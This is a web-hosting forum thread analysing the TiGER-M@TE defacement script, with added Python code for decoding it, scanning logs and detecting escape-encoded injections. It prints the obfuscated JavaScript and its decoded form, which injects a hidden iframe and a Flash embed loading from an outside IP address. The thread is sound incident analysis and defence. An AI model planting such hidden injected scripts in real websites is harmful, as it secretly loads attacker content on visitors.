   "\x25\x32\x38\x36\x46\x76\x66\x75\x6C\x73\x77\x25\x32\x38\x36\x48\x6C\x69\x25\x32\x38\x35\x25\x33\x42\x67\x72\x66\x78\x70\x68\x71\x77\x31\x77\x6C\x77\x6F\x68\x25\x32\x38\x35\x34\x25\x32\x38\x36\x47\x25\x32\x38\x35\x25\x33\x41\x4B\x64\x66\x6E\x68\x47\x25\x32\x38\x35\x33\x45\x25\x37\x43\x25\x32\x38\x35\x33\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x25\x33\x41\x45\x68\x25\x37\x42\x6C\x77\x25\x32\x38\x35\x25\x33\x42\x33\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x36\x45\x25\x32\x38\x25\x33\x41\x47\x25\x32\x38\x33\x44\x67\x72\x66\x78\x70\x68\x71\x77\x31\x7A\x75\x6C\x77\x68\x25\x32\x38\x35\x25\x33\x42\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x36\x46\x6C\x69\x75\x64\x70\x68\x25\x32\x38\x35\x33\x69\x75\x64\x70\x68\x65\x72\x75\x67\x68\x75\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x6B\x68\x6C\x6A\x6B\x77\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x7A\x6C\x67\x77\x6B\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x25\x32\x38\x35\x33\x76\x75\x66\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x37\x33\x37\x31\x73\x6B\x73\x25\x32\x38\x35\x35\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x32\x6C\x69\x75\x64\x70\x68\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x68\x70\x65\x68\x67\x25\x32\x38\x35\x33\x76\x75\x66\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x45\x25\x37\x43\x62\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x31\x76\x7A\x69\x25\x32\x38\x36\x49\x76\x72\x78\x71\x67\x76\x7A\x69\x25\x32\x38\x36\x47\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33
\x42\x32\x31\x31\x31\x32\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x31\x76\x7A\x69\x25\x32\x38\x35\x39\x64\x78\x77\x72\x73\x6F\x64\x25\x37\x43\x25\x32\x38\x36\x47\x34\x25\x32\x38\x35\x39\x6F\x72\x72\x73\x76\x25\x32\x38\x36\x47\x34\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x7A\x6C\x67\x77\x6B\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x6B\x68\x6C\x6A\x6B\x77\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x77\x25\x37\x43\x73\x68\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x64\x73\x73\x6F\x6C\x66\x64\x77\x6C\x72\x71\x32\x25\x37\x42\x30\x76\x6B\x72\x66\x6E\x7A\x64\x79\x68\x30\x69\x6F\x64\x76\x6B\x25\x32\x38\x35\x35\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x32\x68\x70\x65\x68\x67\x25\x32\x38\x36\x48\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x36\x45\x25\x32\x38\x36\x46\x32\x76\x66\x75\x6C\x73\x77\x25\x32\x38\x36\x48\x33"
];

   document[_0xd8af[1]](unescape(_0xd8af[0]));

   dF(_0xd8af[2]);

</script>

<!-- mp3 code ended -->





When we decode this further, we get:
Code: Select all
<!-- mp3 code starts from here,feel free to copy/paste -->

<script language="javascript">

var _0xd8af=[
   "%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E",
   "write",
   "%286Fvfulsw%286Hli%285%3Bgrfxphqw1wlwoh%2854%286G%285%3AKdfnhG%2853E%7C%2853WlJHU0PCWH%285%3A%285%3C%28%3AEh%7Blw%285%3B3%285%3C%286E%28%3AG%283Dgrfxphqw1zulwh%285%3B%285%3A%286Fliudph%2853iudpherughu%286G%28553%2855%2853khljkw%286G%28553%2855%2853zlgwk%286G%28553%2855%2853%2853vuf%286G%2855kwws%286D22%3A%3A157%3A19%3C19%3B211127371sks%2855%286H%286F2liudph%286H%286Fhpehg%2853vuf%286G%2855kwws%286D22%3A%3A157%3A19%3C19%3B21112E%7CbWlJHU0PCWH1vzi%286Ivrxqgvzi%286Gkwws%286D22%3A%3A157%3A19%3C19%3B21112WlJHU0PCWH1vzi%2859dxwrsod%7C%286G4%2859orrsv%286G4%2855%2853zlgwk%286G%28553%2855%2853khljkw%286G%28553%2855%2853w%7Csh%286G%2855dssolfdwlrq2%7B0vkrfnzdyh0iodvk%2855%286H%286F2hpehg%286H%285%3A%285%3C%286E%286F2vfulsw%286H3"
];

   document[_0xd8af[1]](unescape(_0xd8af[0]));

   dF(_0xd8af[2]);

</script>

<!-- mp3 code ended -->


And when we decode it further, we get:
Code: Select all
<!-- mp3 code starts from here,feel free to copy/paste -->

<script language="javascript">

var _0xd8af=[
   "<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>",
   "write",
   "%286Fvfulsw%286Hli%285%3Bgrfxphqw1wlwoh%2854%286G%285%3AKdfnhG%2853E%7C%2853WlJHU0PCWH%285%3A%285%3C%28%3AEh%7Blw%285%3B3%285%3C%286E%28%3AG%283Dgrfxphqw1zulwh%285%3B%285%3A%286Fliudph%2853iudpherughu%286G%28553%2855%2853khljkw%286G%28553%2855%2853zlgwk%286G%28553%2855%2853%2853vuf%286G%2855kwws%286D22%3A%3A157%3A19%3C19%3B211127371sks%2855%286H%286F2liudph%286H%286Fhpehg%2853vuf%286G%2855kwws%286D22%3A%3A157%3A19%3C19%3B21112E%7CbWlJHU0PCWH1vzi%286Ivrxqgvzi%286Gkwws%286D22%3A%3A157%3A19%3C19%3B21112WlJHU0PCWH1vzi%2859dxwrsod%7C%286G4%2859orrsv%286G4%2855%2853zlgwk%286G%28553%2855%2853khljkw%286G%28553%2855%2853w%7Csh%286G%2855dssolfdwlrq2%7B0vkrfnzdyh0iodvk%2855%286H%286F2hpehg%286H%285%3A%285%3C%286E%286F2vfulsw%286H3"
];

   document[_0xd8af[1]](unescape(_0xd8af[0]));

   dF(_0xd8af[2]);

</script>

<!-- mp3 code ended -->



There's some javascript in there, cleaned up it looks like:
Code: Select all
<script language="javascript">
function dF(s)
{
   // Everything but the last character is the encoded body; the last
   // character is the numeric shift key (here "3").
   var s1=unescape(s.substr(0,s.length-1));

   var t='';

   // The brace-less for loop covers only this one statement: shift every
   // character code down by the key.
   for(i=0;i<s1.length;i++)
      t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));

   // Runs once after the loop: unescape the shifted text a second time and
   // inject the result into the page.
   document.write(unescape(t));
}
</script>



Above, a function named dF is created, and it is expecting a variable named s.

The function is called earlier in the script, here:
Code: Select all
dF(_0xd8af[2])


So you can see that it passes this variable:
Code: Select all
_0xd8af[2]


... which actually equals:
Code: Select all
%286Fvfulsw%286Hli%285%3Bgrfxphqw1wlwoh%2854%286G%285%3AKdfnhG%2853E%7C%2853WlJHU0PCWH%285%3A%285%3C%28%3AEh%7Blw%285%3B3%285%3C%286E%28%3AG%283Dgrfxphqw1zulwh%285%3B%285%3A%286Fliudph%2853iudpherughu%286G%28553%2855%2853khljkw%286G%28553%2855%2853zlgwk%286G%28553%2855%2853%2853vuf%286G%2855kwws%286D22%3A%3A157%3A19%3C19%3B211127371sks%2855%286H%286F2liudph%286H%286Fhpehg%2853vuf%286G%2855kwws%286D22%3A%3A157%3A19%3C19%3B21112E%7CbWlJHU0PCWH1vzi%286Ivrxqgvzi%286Gkwws%286D22%3A%3A157%3A19%3C19%3B21112WlJHU0PCWH1vzi%2859dxwrsod%7C%286G4%2859orrsv%286G4%2855%2853zlgwk%286G%28553%2855%2853khljkw%286G%28553%2855%2853w%7Csh%286G%2855dssolfdwlrq2%7B0vkrfnzdyh0iodvk%2855%286H%286F2hpehg%286H%285%3A%285%3C%286E%286F2vfulsw%286H3


So when this script is executed, it does the following:
Code: Select all
// Only run on the defaced page itself. exit() is not a browser function, so on
// any other page this line throws a ReferenceError, which ends the script just the same.
if(document.title!='HackeD By TiGER-M@TE')
{
   exit(0);
}
// The "..." in these URLs is a literal directory name in the decoded string, not an abbreviation.
document.write('<iframe frameborder="0" height="0" width="0" src="http://77.247.69.68/.../404.php"></iframe>'
             + '<embed src="http://77.247.69.68/.../By_TiGER-M@TE.swf?soundswf=http://77.247.69.68/.../TiGER-M@TE.swf&autoplay=1&loops=1" width="0" height="0" type="application/x-shockwave-flash"></embed>');


So it was trying to load http://77.247.69.68/.../404.php in an iframe and then play the following flash file:
Code: Select all
http://77.247.69.68/.../By_TiGER-M@TE.swf?soundswf=http://77.247.69.68/.../TiGER-M@TE.swf&autoplay=1&loops=1



Both URLs in question don't load in a browser, so they in effect are useless. The 77.247.69.68 belongs to rackhosting.com, which I assume they found out what was going on and shut it down.
bradm
InMotion Staff
 
Posts: 357
Joined: Wed Jan 16, 2008 9:29 pm
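
The decoding above was done by hand with web-based translators. The script below is an added example written for this thread, not the attacker's code and not something InMotion shipped: it re-implements the two layers the post walks through (the "\x25\x33..." string literals, then dF()'s unescape / shift-by-key / unescape) so the payload can be read offline instead of being executed in a browser, and it pulls out every remote URL the decoded HTML references. The only inputs are the _0xd8af[1] and _0xd8af[2] strings copied from the defaced page; the decoded paths really do contain a directory named "..." and the decoder reproduces them as-is. URL_RE, js_unescape and analyse are names chosen here.

```python
"""Offline decoder for the TiGER-M@TE defacement script (added example).

Layer 1: JavaScript string literals written as \\xNN escapes -> text.
Layer 2: the page's dF(s): unescape(s minus its last character), subtract
         that last character (a numeric key) from every char code, unescape
         the result again. The original then document.write()s it; here we
         just return it for inspection.
"""
import re
from typing import Dict, List

# Inputs copied verbatim from the _0xd8af array on the defaced page.
HEX_LITERAL = r"\x77\x72\x69\x74\x65"  # _0xd8af[1]
ENCODED = (                             # _0xd8af[2]
    "%286Fvfulsw%286Hli%285%3Bgrfxphqw1wlwoh%2854%286G%285%3AKdfnhG%2853E%7C"
    "%2853WlJHU0PCWH%285%3A%285%3C%28%3AEh%7Blw%285%3B3%285%3C%286E%28%3AG%283D"
    "grfxphqw1zulwh%285%3B%285%3A%286Fliudph%2853iudpherughu%286G%28553%2855"
    "%2853khljkw%286G%28553%2855%2853zlgwk%286G%28553%2855%2853%2853vuf%286G%2855"
    "kwws%286D22%3A%3A157%3A19%3C19%3B211127371sks%2855%286H%286F2liudph%286H"
    "%286Fhpehg%2853vuf%286G%2855kwws%286D22%3A%3A157%3A19%3C19%3B21112E%7Cb"
    "WlJHU0PCWH1vzi%286Ivrxqgvzi%286Gkwws%286D22%3A%3A157%3A19%3C19%3B21112"
    "WlJHU0PCWH1vzi%2859dxwrsod%7C%286G4%2859orrsv%286G4%2855%2853zlgwk%286G"
    "%28553%2855%2853khljkw%286G%28553%2855%2853w%7Csh%286G%2855dssolfdwlrq2"
    "%7B0vkrfnzdyh0iodvk%2855%286H%286F2hpehg%286H%285%3A%285%3C%286E%286F2vfulsw%286H3"
)

# JavaScript's unescape() decodes %XX and %uXXXX left to right in one pass.
_ESC = re.compile(r"%(u[0-9A-Fa-f]{4}|[0-9A-Fa-f]{2})")
# A URL stops at ? and & so the swf nested in a query string is listed too.
URL_RE = re.compile(r"https?://[^\s'\"<>?&]+")


def js_unescape(s: str) -> str:
    """Single-pass equivalent of JavaScript's unescape()."""
    return _ESC.sub(lambda m: chr(int(m.group(1).lstrip("u"), 16)), s)


def decode_js_hex_literal(s: str) -> str:
    """Layer 1: resolve \\xNN escapes in a JavaScript string literal body."""
    return re.sub(r"\\x([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1), 16)), s)


def dF(s: str) -> str:
    """Layer 2: Python port of the page's dF(), without the document.write()."""
    key = int(s[-1])                       # last character is the shift key
    body = js_unescape(s[:-1])             # first unescape of the body
    shifted = "".join(chr(ord(c) - key) for c in body)
    return js_unescape(shifted)            # second unescape yields the HTML


def extract_urls(html: str) -> List[str]:
    """Every remote resource the decoded HTML would load."""
    return URL_RE.findall(html)


def analyse(encoded: str = ENCODED) -> Dict[str, object]:
    """Decode one dF() argument and summarise what it would do."""
    decoded = dF(encoded)
    return {
        "key": int(encoded[-1]),
        "guard": "document.title" in decoded,  # runs only on the defaced page
        "urls": extract_urls(decoded),
        "decoded": decoded,
    }


if __name__ == "__main__":
    result = analyse()
    print("layer 1 sample:", decode_js_hex_literal(HEX_LITERAL))
    print("shift key:", result["key"])
    print("remote resources:")
    for url in result["urls"]:
        print("  ", url)
    print()
    print(result["decoded"])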

Re: What does the TiGER-M@TE hack file actually do?

Postby Helius on Thu Sep 29, 2011 2:46 pm

Awesome! Thanks Brad. I actually already did this the day of the hack, but I'm sure others would like to know.
Helius
Forum User
 
Posts: 26
Joined: Sun Jul 19, 2009 2:58 pm
Location: Virginia Beach

Re: What does the TiGER-M@TE hack file actually do?

Postby tsmwebb on Thu Sep 29, 2011 6:08 pm

Great work! That is exactly what I have been looking for. So, there is a potentially malicious payload in the script but it isn't working.

Question: the redirect doesn't work now, but did it work on Sunday? If so, what might it have done to our visitors who ran it?

Tom
tsmwebb
Forum User
 
Posts: 6
Joined: Thu Sep 29, 2011 6:16 am

Re: What does the TiGER-M@TE hack file actually do?

Postby bradm on Thu Sep 29, 2011 6:49 pm

Hi Tom,

Thanks for touching base.

Question: the redirect doesn't work now, but did it work on Sunday? If so, what might it have done to our visitors who ran it?


I assume that it worked on Sunday, otherwise I'm not sure why the hacker attempted to load that URL within an IFRAME. If the URL in the iframe attempted to load malware onto the users computer and they didn't have any antivirus programs running that caught it, then they may have been infected. It's really hard to say what that page actually did.

For anyone that is worried they might be infected, I highly recommend downloading the free version of malware bytes and scanning your computer, I've used that software numerous times with great success.

Thanks,
- Brad
bradm
InMotion Staff
 
Posts: 357
Joined: Wed Jan 16, 2008 9:29 pm

Re: What does the TiGER-M@TE hack file actually do?

Postby tsmwebb on Thu Sep 29, 2011 7:13 pm

bradm wrote:Hi Tom,

Thanks for touching base.

Question: the redirect doesn't work now, but did it work on Sunday? If so, what might it have done to our visitors who ran it?


I assume that it worked on Sunday, otherwise I'm not sure why the hacker attempted to load that URL within an IFRAME. If the URL in the iframe attempted to load malware onto the users computer and they didn't have any antivirus programs running that caught it, then they may have been infected. It's really hard to say what that page actually did.

For anyone that is worried they might be infected, I highly recommend downloading the free version of malware bytes and scanning your computer, I've used that software numerous times with great success.

Thanks,
- Brad


Thanks very much! That makes sense to me and is very useful. At the very least it will help me explain what happened to folks even less competent in these issues than I. Are you guys looking to see if the page was saved somewhere (eg. have you contacted the host) to see if you can id the actual malware?

I think it is worth noting that when I ran the file through VirusTotal (http://www.virustotal.com/index.html) several engines reported the exploit you found. The methods that you guys used to come to your initial conclusion that this was just a "defacement" hack seem inadequate. Next time (let's hope there isn't one) it might be worth running suspect files through VT or similar first.

Cheers!

Tom
tsmwebb
Forum User
 
Posts: 6
Joined: Thu Sep 29, 2011 6:16 am

Re: What does the TiGER-M@TE hack file actually do?

Postby bradm on Thu Sep 29, 2011 7:25 pm

Hi Tom,

Are you guys looking to see if the page was saved somewhere (eg. have you contacted the host) to see if you can id the actual malware?


I just sent RackHosting.com an email. We'll see what they say.

Thanks,
- Brad
bradm
InMotion Staff
 
Posts: 357
Joined: Wed Jan 16, 2008 9:29 pm

Re: What does the TiGER-M@TE hack file actually do?

Postby bradm on Fri Sep 30, 2011 12:16 pm

Hi everyone,

I was able to actually get that 404.php file and look at the contents.

That file does 2 things:

1. The file logged the visit to a visits.txt file. So basically what happened is that every time a user visited one of his hacked pages, it logged the domain of the hacked page. In this way, he was able to keep track of how many people were viewing his hacked pages.

2. After doing #1 above, it redirected the user to:
http://www.google.com/search?q=hacked+by+tiger-m%40te

That is just a google search for "hacked by tiger-m@te". I assume his reason for doing this was to boost his ratings in google for anyone that search for his name.

As the iframe was hidden, users visiting the hacked sites were unaware of what was going on (i.e. the redirect to a google search).

Thanks,
- Brad
bradm
InMotion Staff
 
Posts: 357
Joined: Wed Jan 16, 2008 9:29 pm

Re: What does the TiGER-M@TE hack file actually do?

Postby Robert A. on Fri Sep 30, 2011 3:26 pm

Soon after the hack was placed, my site got a visit from this server:

217-162-28-98.static.tinext.net

which is in Switzerland. Evidently it was the hacker (or a colleague) verifying the hack. However, it did not visit my site default index page. Instead, it looked for /hacked-site (that is, my domain name followed by /hacked-site).

It is not clear to me why that worked. I would expect that the visiting hacker should have gotten a 404 error. But my 404 file is OK.

That successfully delivered the 12000+ bytes of code to the recipient, who checked twice. As is noted on another forum post, the code itself is rather harmless, but it calls an external file using an IFRAME, and that external file (unknown content) could be malicious. Presumably the hacker blocked the URL for the IFRAME, which would make it safe to view his own code.

On my site, nobody other than the hacker was able to get the code. That's because my site is configured in a peculiar way (not recommended for other users, as it will not work with Wordpress, Joomla, or like software). Anyone else got a 403 or 404 error, until I fixed it.

As was noted elsewhere: The hacking files are not just at your site's top level; they will be in sub-directories too.
Robert A.
Forum User
 
Posts: 1
Joined: Fri Sep 30, 2011 3:15 pm
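
Robert's observation is a usable detection: the checking host asked for /hacked-site rather than the front page, and a 200 with a 12000+ byte body meant the defacement was actually served. The script below is an added example for this thread, not code from the post or from InMotion. It walks an Apache combined-format access log, picks out requests for the probe path, marks whether the defacement was served, and reports the earliest probe and the source addresses, which bounds when the files were already in place. The log lines, IP addresses and the 10000-byte size cut-off are constructed for the example; PROBE_PATHS, find_probes and summarize are names chosen here.

```python
"""Access-log triage for the post-defacement verification probe (added example).

Finds requests for the path the checking host used, decides from status and
response size whether the defacement was actually served, and summarises
who probed and when. Sample log lines and addresses are constructed.
"""
import re
from datetime import datetime
from typing import Dict, Iterable, List, Optional

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PROBE_PATHS = {"/hacked-site", "/hacked-site/"}
MIN_DEFACEMENT_BYTES = 10000   # the served defacement was reported as 12000+ bytes

# Constructed sample: one normal visitor, one host that probed twice and got
# the defacement, one host that probed after the fix and got a 404, one bad line.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Sep/2011:09:12:01 -0400] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.0.2.98 - - [25/Sep/2011:10:41:17 -0400] "GET /hacked-site HTTP/1.1" 200 12417 "-" "Mozilla/4.0 (compatible; MSIE 7.0)"
192.0.2.98 - - [25/Sep/2011:10:41:19 -0400] "GET /hacked-site HTTP/1.1" 200 12417 "-" "Mozilla/4.0 (compatible; MSIE 7.0)"
198.51.100.4 - - [25/Sep/2011:11:02:44 -0400] "GET /blog/ HTTP/1.1" 403 312 "-" "Mozilla/5.0"
198.51.100.4 - - [25/Sep/2011:11:02:50 -0400] "GET /hacked-site HTTP/1.1" 404 289 "-" "Mozilla/5.0"
this line is garbage and must be skipped
"""


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one combined-format line; return None for anything malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec: Dict[str, object] = m.groupdict()
    rec["time"] = datetime.strptime(str(rec["time"]), "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(str(rec["status"]))
    rec["size"] = 0 if rec["size"] == "-" else int(str(rec["size"]))
    return rec


def find_probes(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Requests for the probe path, oldest first, flagged if the defacement
    was served (200 and a body at least as large as the defacement file)."""
    probes = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["path"] not in PROBE_PATHS:
            continue
        rec["served"] = (rec["status"] == 200
                         and int(str(rec["size"])) >= MIN_DEFACEMENT_BYTES)
        probes.append(rec)
    return sorted(probes, key=lambda r: r["time"])


def summarize(probes: List[Dict[str, object]]) -> Dict[str, object]:
    """Earliest probe (a lower bound on when the files were in place),
    distinct sources, and how many probes received the defacement."""
    return {
        "first_seen": probes[0]["time"].isoformat() if probes else None,
        "sources": sorted({str(p["ip"]) for p in probes}),
        "served_count": sum(bool(p["served"]) for p in probes),
    }


if __name__ == "__main__":
    import sys
    lines = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOG.splitlines()
    found = find_probes(lines)
    for p in found:
        print(p["time"], p["ip"], p["status"], p["size"], "served" if p["served"] else "-", p["ua"])
    print(summarize(found))
```

Run it against the real access_log (and the archived, rotated ones, since the hack was several days old by the time this thread started). The first served probe is the latest moment the defacement files can have been placed; the sources list is what to hand to the host or to block, and any probe that was served after you believe you cleaned up means a copy in a sub-directory was missed.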

Re: What does the TiGER-M@TE hack file actually do?

Postby TimS on Fri Sep 30, 2011 5:06 pm

Hi Robert A.,

Thanks for commenting. The visit from the server was due to verification, but it was not compromising anything. The iframe you mentioned, which we have reviewed the code for does not contain anything malicious in nature.

If you have anymore questions or comments please feel free to contact us. thank you!

Tim S.
TimS
InMotion Staff
 
Posts: 385
Joined: Mon Sep 12, 2011 11:27 am

Re: What does the TiGER-M@TE hack file actually do?

Postby FlyFlRidge on Mon Oct 10, 2011 5:28 pm

A Stupid question/suggestion....

Couldn't INMOTION have a scan in place for when files are being Uploaded, that looks for this type of "escape character codes" which unescape to Javascript ??
FlyFlRidge
Forum User
 
Posts: 1
Joined: Mon Oct 10, 2011 5:24 pm

Re: What does the TiGER-M@TE hack file actually do?

Postby TimS on Tue Oct 11, 2011 1:22 pm

Hi FlyFlRidge,

Thanks for posting in the forums. We do have a tool running on the servers that scans files uploaded via FTP and looks for mal-intended code. However, due to this specific hacker's methodology it may not have been fruitful. But the idea you spoke about is already in place.

If you have further questions or need any assistance please feel free to contact us.

Thank you!

Tim S.
TimS
InMotion Staff
 
Posts: 385
Joined: Mon Sep 12, 2011 11:27 am
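
For anyone who wants to run the check FlyFlRidge describes over their own account, the scanner below is an added example written for this thread; it is not InMotion's upload tool and assumes nothing about how that tool works. The point it makes is that you cannot simply grep for "iframe" or "document.write": in this sample the iframe exists only after two decoding layers, and even the method name is reached through document[_0xd8af[1]], so the raw file never contains the word write. What the raw file does show is the shape of the obfuscation, and that is what gets scored: the fraction of the file made up of \xNN and %NN escapes, the `var _0x....=[` string-array idiom, document[...] or window[...] indexed through such an array, and a decoder call (unescape, fromCharCode, eval). The two samples are constructed, the first from fragments of the code posted above and the second a benign page that uses unescape() legitimately; the score weights and the 0.25 ratio threshold are choices made here, and heavily minified legitimate code can trip the ratio, so treat a hit as something to decode, not as proof.

```python
"""Heuristic scanner for escape-encoded script injections (added example).

Scores the *shape* of the obfuscation seen in the TiGER-M@TE file, because the
payload strings themselves are only visible after decoding. Samples are
constructed; thresholds and weights are this example's own choices.
"""
import os
import re
from typing import Dict, List, Optional

HEX_ESC = re.compile(r"\\x[0-9A-Fa-f]{2}")      # \x25 style, 4 chars each
PCT_ESC = re.compile(r"%[0-9A-Fa-f]{2}")        # %25 style, 3 chars each
INDICATORS = {
    # var _0xd8af=[ ... ]  : string-array idiom of common JS obfuscators
    "obfuscator_array": re.compile(r"\bvar\s+_0x[0-9A-Fa-f]+\s*=\s*\["),
    # document[_0xd8af[1]] / window[_0x8ae2[1]] : method names looked up at runtime
    "computed_member": re.compile(r"\b(?:document|window)\s*\[\s*_0x[0-9A-Fa-f]+\s*\["),
    "unescape": re.compile(r"\bunescape\s*\("),
    "from_char_code": re.compile(r"\bfromCharCode\s*\("),
    "eval": re.compile(r"\beval\s*\("),
}
SCAN_SUFFIXES = (".html", ".htm", ".php", ".js", ".txt")

# Constructed from fragments of the defacement code posted in this thread.
SAMPLE_DEFACEMENT = (
    '<!-- mp3 code starts from here,feel free to copy/paste -->\n'
    '<script language="javascript">var _0xd8af=["'
    r'\x25\x33\x43\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34'
    r'\x25\x32\x30\x25\x36\x43\x25\x36\x31\x25\x36\x45\x25\x36\x37'
    r'","\x77\x72\x69\x74\x65",'
    '"%286Fvfulsw%286Hli%285%3Bgrfxphqw1wlwoh%2854%286G%285%3AKdfnhG"];'
    'document[_0xd8af[1]](unescape(_0xd8af[0]));dF(_0xd8af[2]);</script>\n'
)
# Constructed benign page: one legitimate unescape() and a few %XX in text.
SAMPLE_BENIGN = (
    '<html><head><title>Shop</title>\n'
    '<script>var q = unescape(location.search.substr(1));'
    ' document.getElementById("q").value = q;</script>\n'
    '</head><body><p>Opening hours: 9:00%E2%80%9317:00</p></body></html>\n'
)


def escape_ratio(text: str) -> float:
    """Fraction of the file occupied by \\xNN and %NN escape sequences."""
    if not text:
        return 0.0
    covered = 4 * len(HEX_ESC.findall(text)) + 3 * len(PCT_ESC.findall(text))
    return covered / len(text)


def scan_text(text: str, ratio_threshold: float = 0.25) -> Optional[Dict[str, object]]:
    """Return a finding for suspicious content, None for anything below the bar."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    ratio = escape_ratio(text)
    score = 0
    if ratio >= ratio_threshold:
        score += 3          # most of the file is escape sequences
    if "obfuscator_array" in hits:
        score += 2
    if "computed_member" in hits:
        score += 2
    if any(h in hits for h in ("unescape", "from_char_code", "eval")):
        score += 1          # a decoder alone is weak evidence (see SAMPLE_BENIGN)
    if score < 3:
        return None
    return {"score": score, "escape_ratio": round(ratio, 2), "indicators": hits}


def scan_tree(root: str) -> List[Dict[str, object]]:
    """Scan every web-ish file under root, sub-directories included."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    finding = scan_text(fh.read())
            except OSError:
                continue
            if finding:
                finding["path"] = path
                findings.append(finding)
    return findings


if __name__ == "__main__":
    import sys
    for f in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f["path"], f["score"], f["escape_ratio"], ",".join(map(str, f["indicators"])))
```

Point it at your document root (public_html) and it walks the sub-directories too, which matters because, as noted earlier in this thread, the defacement files were not only at the top level. Anything it flags should then be decoded, not opened in a browser.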

